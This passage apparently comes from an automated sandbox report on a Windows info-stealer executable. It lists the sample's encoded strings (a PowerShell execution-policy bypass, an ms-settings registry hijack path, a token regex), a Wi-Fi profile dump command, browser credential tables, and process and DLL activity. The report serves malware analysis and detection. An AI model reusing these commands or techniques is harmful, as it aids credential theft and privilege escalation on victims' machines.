    Source: iGxCM2I5u9.exe, AcohdgxumZqMtqiEyujcnGKSk.csBase64 encoded string: 'L2Mgc3RhcnQgL2IgcG93ZXJzaGVsbCDigJNFeGVjdXRpb25Qb2xpY3kgQnlwYXNzIFN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICci', 'U29mdHdhcmVcQ2xhc3Nlc1xtcy1zZXR0aW5nc1xTaGVsbFxPcGVuXGNvbW1hbmQ=', 'QUNnYktLOG8veWpmS084b1Z5ajJLRElvUVNpQUtFQW9KQ2dzS0E4b0pTZ2tLQUFvUUNocEtKSW96aWk5S1A4byt5Z3ZLQjRvQVNnZ0FBPT0=', 'QUNnQUtBQW9BQ2lKS0Iwb0V5aTdLT1FvZUNnaktFQW9BQ2dBS0FBb0FDZ0FLQ0FvR2lqMEtING9YeWdKS0NNb1FDZ0FLQUFvQUNnZ0FBPT0=', 'QUNnQUtBQW80Q2p6S01Zb0ZDZ0pLQThvL3loRUtMRW81Q2lFS01Bb3BDajBLRWNvOENoZktLa29BU2dnS0hRb2Z5aEVLQUFvQUNnZ0FBPT0=', 'QUNnQUtLQW9BU2lBS0E0b0FDZ0FLQmdvL0NoL0tEc29HU2pOS01Bb1BDZzVLRjhvL3lqRUtNTW9BQ2dBS0Jnb1JDZ0lLRVFvQUNnZ0FBPT0=', 'QUNnQUtBY29nQ2pzS1BZbzdDaHJLSXNvZkNpM0tGY29nQ2lYS0Frb0p5aEFLTW9vdUNqbktORW85Q2p0S1BRbzlDaEVLRGdvQUNnZ0FBPT0=', 'QUNpNEtBQW9DQ2dKS0Jzb055aitLUDhveHlqdktPY295eWlKS0gwb0RTaVpLUDBvemlqL0tQOG9KeWdmS0Fzb0FTaEdLQUFvUkNnZ0FBPT0=', 'QUNpNEtJQW9RQ2dBS0lBb1lDZ1lLSWtvZnlqL0tQOG8veWhXS0FFb3NDai9LUDhvL3lqL0tFZ29FU2dpS01Bb0FDam5LRUFvUnlnZ0FBPT0=', 'QUNnWUtFNG9EeWdXS0JNb0VpZ1NLRG9vL3loSUtMY29neWdCS0FBb0RpZzhLSDRveVNqL0tBY29BQ2dBS0Fnb2dTZ0pLS3NvQUNnZ0FBPT0=', 'QUNnQUtLRW9BQ2dRS0VBb0FDZ0FLQUFvT1NqL0tPNG9JaWhIS0FBb3VDZ1FLUFVvdnlnTEtBQW9BQ2dBS0FBb0JpZ0FLRXdvQUNnZ0FBPT0=', 'QUNnQUtBQW9veWdBS0Fnb2hDZ0FLQUFvQUNnSUtCa29SeWhHS0JBb3VDaTRLQXNvQVNnQUtBQW9BQ2dBS0Fvb0FDaGNLQUFvQUNnZ0FBPT0=', 'QUNnQUtBQW9BQ2dSS01Rb0FDZ1JLSVFvUUNnQUtBQW8veWptS09RbzlDaitLQUFvQUNnQUtFQW9FQ2dCS09Bb0NpZ0FLQUFvQUNnZ0FBPT0=', 'QUNnQUtBQW9BQ2dBS0Fnb0VpaWtLSDhvQ0NnUUtBQW9OQ2l0S1A4bzdTZ3VLQUFvRWlncEtQNG9aQ2dhS0FFb0FDZ0FLQUFvQUNnZ0FBPT0=', 'QUNnQUtBQW9BQ2dBS0FBb0FDZ0FLQWdvRUNnQUtDUW9BQ2lJS1BZb1dDZ0FLQ1FvRkNnQ0tBRW9BQ2dBS0FBb0FDZ0FLQUFvQUNnZ0FBPT0=', 'QUNnQUtBQW9BQ2dBS0FBb0FDZ0FLQUFvQUNnQUtBQW9BQ2dBS0Jrb0FDZ0FLQUFvQUNnQUtBQW9BQ2dBS0FBb0FDZ0FLQUFvQUNnZ0FDQUE=', 'Q1FBSkFEM1lzOXdnQUVNQWNnQmxBR1FBYVFCMEFFTUFZUUJ5QUdRQWN3QTZBQ0FB', 'Q1FBSkFEM1lGdDBnQUVJQWJ3QnZBR3NBYlFCaEFISUFhd0J6QURvQUlBQT0=', 'Q1FBSkFEM1k1dHdnQUVRQWJ3QjNBRzRBYkFCdkFHRUFaQUJ6QURvQUlBQT0=', 'Q1FBSkFEellxTjhnQUZJQVpRQnpBSFFBYndCeUFHVUFWQUJ2QUdzQVpRQnVBSE1BT2dBZ0FBPT0=', 'Q1FBSkFEN1l5dDBnQUZjQVlRQnNBR3dBWlFCMEFITUFPZ0FnQUE9PQ==', 'Q1FCRUp3LytJQUJYQUdFQWJBQnNBR1VBZEFCekFDQUFRUUJ3QUhBQU9nQWdBQT09', 'Q1FBKzJLTGRJQUJRQUdrQVpBQm5BR2tBYmdBZ0FFRUFjQUJ3QURvQUlBQT0=', 'Q1FBOTJIN2NJQUJFQUdrQWN3QmpBRzhBY2dCa0FDQUFWQUJ2QUdzQVpRQnVBSE1BT2dBZ0FBPT0=', 'Q1FBSUp3LytJQUJVQUdVQWJBQmxBR2NBY2dCaEFHMEFJQUJ6QUdVQWN3QnpBR2tBYndCdUFITUE=', 'Q1FBQkpnLytJQUJUQUdzQWVRQndBR1VBSUFCekFHVUFjd0J6QUdrQWJ3QnVBQT09', 'Q1FBOTJIN2NJQUJFQUdrQWN3QmpBRzhBY2dCa0FDQUFkQUJ2QUdzQVpRQnVBQT09', 'Q1FBOTJLM2NJQUJUQUdrQVp3QnVBR0VBYkFBZ0FITUFaUUJ6QUhNQWFRQnZBRzRB', 'Q1FBODJLN2ZJQUJUQUhRQVpRQmhBRzBBSUFCekFHVUFjd0J6QUdrQWJ3QnVBQT09', 'Q1FBODJLN2ZJQUJWQUhBQWJBQmhBSGtBSUFCekFHVUFjd0J6QUdrQWJ3QnVBQT09', 'Q1FDWkpnLytJQUJRQUhJQWJ3QmpBR1VBY3dCekFHVUFjd0E2QUNBQQ==', 'W1x3LV17MjQsMjZ9XC5bXHctXXs2fVwuW1x3LV17MjUsMTEwfXxtZmFcLlthLXpBLVowLTlfXC1dezg0fQ==', 'U29mdHdhcmVcTWljcm9zb2Z0XE9mZmljZVwxNS4wXE91dGxvb2tcUHJvZmlsZXNcT3V0bG9va1w5Mzc1Q0ZGMDQxMzExMWQzQjg4QTAwMTA0QjJBNjY3Ng==', 'U29mdHdhcmVcTWljcm9
    Source: iGxCM2I5u9.exe, 00000000.00000002.103305186713.000001607791D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $ro\W;.VBP
    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@10/2@3/3
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeMutant created: NULL
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3156:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3156:304:WilStaging_02
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeFile created: C:\Users\user\AppData\Local\Temp\downloadedFile.exeJump to behavior
    Source: iGxCM2I5u9.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: iGxCM2I5u9.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F1D9000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EFB3000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F0AA000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F006000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F197000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F08E000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F06D000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EFD4000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F176000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F1B8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE benefit_merchant_domains (benefit_id VARCHAR NOT NULL, merchant_domain VARCHAR NOT NULL)U;
    Source: iGxCM2I5u9.exe, 00000000.00000002.103305186713.000001607799A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
    Source: iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F157000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EFF4000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606ED5B000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F1F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;
    Source: iGxCM2I5u9.exeReversingLabs: Detection: 65%
    Source: unknownProcess created: C:\Users\user\Desktop\iGxCM2I5u9.exe "C:\Users\user\Desktop\iGxCM2I5u9.exe"
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr All
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles | findstr AllJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profilesJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr AllJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: edgegdi.dllJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: rasapi32.dllJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: rasman.dllJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: rtutils.dllJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: dwrite.dllJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: windowscodecs.dllJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: napinsp.dllJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: pnrpnsp.dllJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: wshbth.dllJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: nlaapi.dllJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: winrnr.dllJump to behavior
    Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
    Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: edgegdi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: onex.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: slc.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\findstr.exeSection loaded: edgegdi.dllJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
    Source: iGxCM2I5u9.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
    Source: iGxCM2I5u9.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: iGxCM2I5u9.exeStatic PE information: 0x9A13B17D [Thu Nov 30 18:31:25 2051 UTC]
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeCode function: 0_2_00007FFBC7C59725 push cs; iretd 0_2_00007FFBC7C5976A
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeCode function: 0_2_00007FFBC7C500BD pushad ; iretd 0_2_00007FFBC7C500C1
    Source: iGxCM2I5u9.exe, YNQggCGIprkgfKSFO.csHigh entropy of concatenated method names: 'yaQsiQjOIaNVMcbsUYNIYqAma', 'jfoqIjiIQWJffAwStf', 'UfHEmpurGaIZdSGgDaSRemDM', 'josMLGwUrGx', 'aBAOrciIwfNZTtrbOQ', 'bvzDBBfvTLEmMJFcZRDm', 'UDIDbTtRPVGbY', 'fbyzMMhOwstBQOQS', 'KdXGrrzaildEq', 'LnnZBaSqadFHQKZCeBxLwxAOn'
    Source: iGxCM2I5u9.exe, eUZcfxaGLVMSHSrJHtKYI.csHigh entropy of concatenated method names: 'SBohrrBlujVWUCRUM', 'PsypwigwOSQgzEKjUU', 'XuiosVQmdMlQIDiMyYdFFAuc', 'UOjQLkhwaoghDGTfvCkd', 'IcRsMLrPoW', 'GEXHgWRcDUhOBfuSJZKyKyhMl', 'YzZqgmShbyiMzZk', 'ahaNQNSshpeY', 'HXLVPxSCMnvwTEvkxakNCX', 'lXALggIrHu'
    Source: iGxCM2I5u9.exe, AcohdgxumZqMtqiEyujcnGKSk.csHigh entropy of concatenated method names: 'vAoWMpNCmxjb', 'iqybDWaoMVQZhh', 'KuSWxWkxGQMByqEkVWfAmp', 'HwJSjeXwfHarseNesyt', 'KqVcyIkvCBhBVPLaoEASjTh', 'YzMGIsmBswUQbhUbubtdaYVc', 'mpoxbJrJbDywenK', 'fJZvuzHjZYHZDS', 'djnVCyEQncHzdVfPojOvPwhYn', 'EYDBSGIEVMrRHQbslSnz'
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
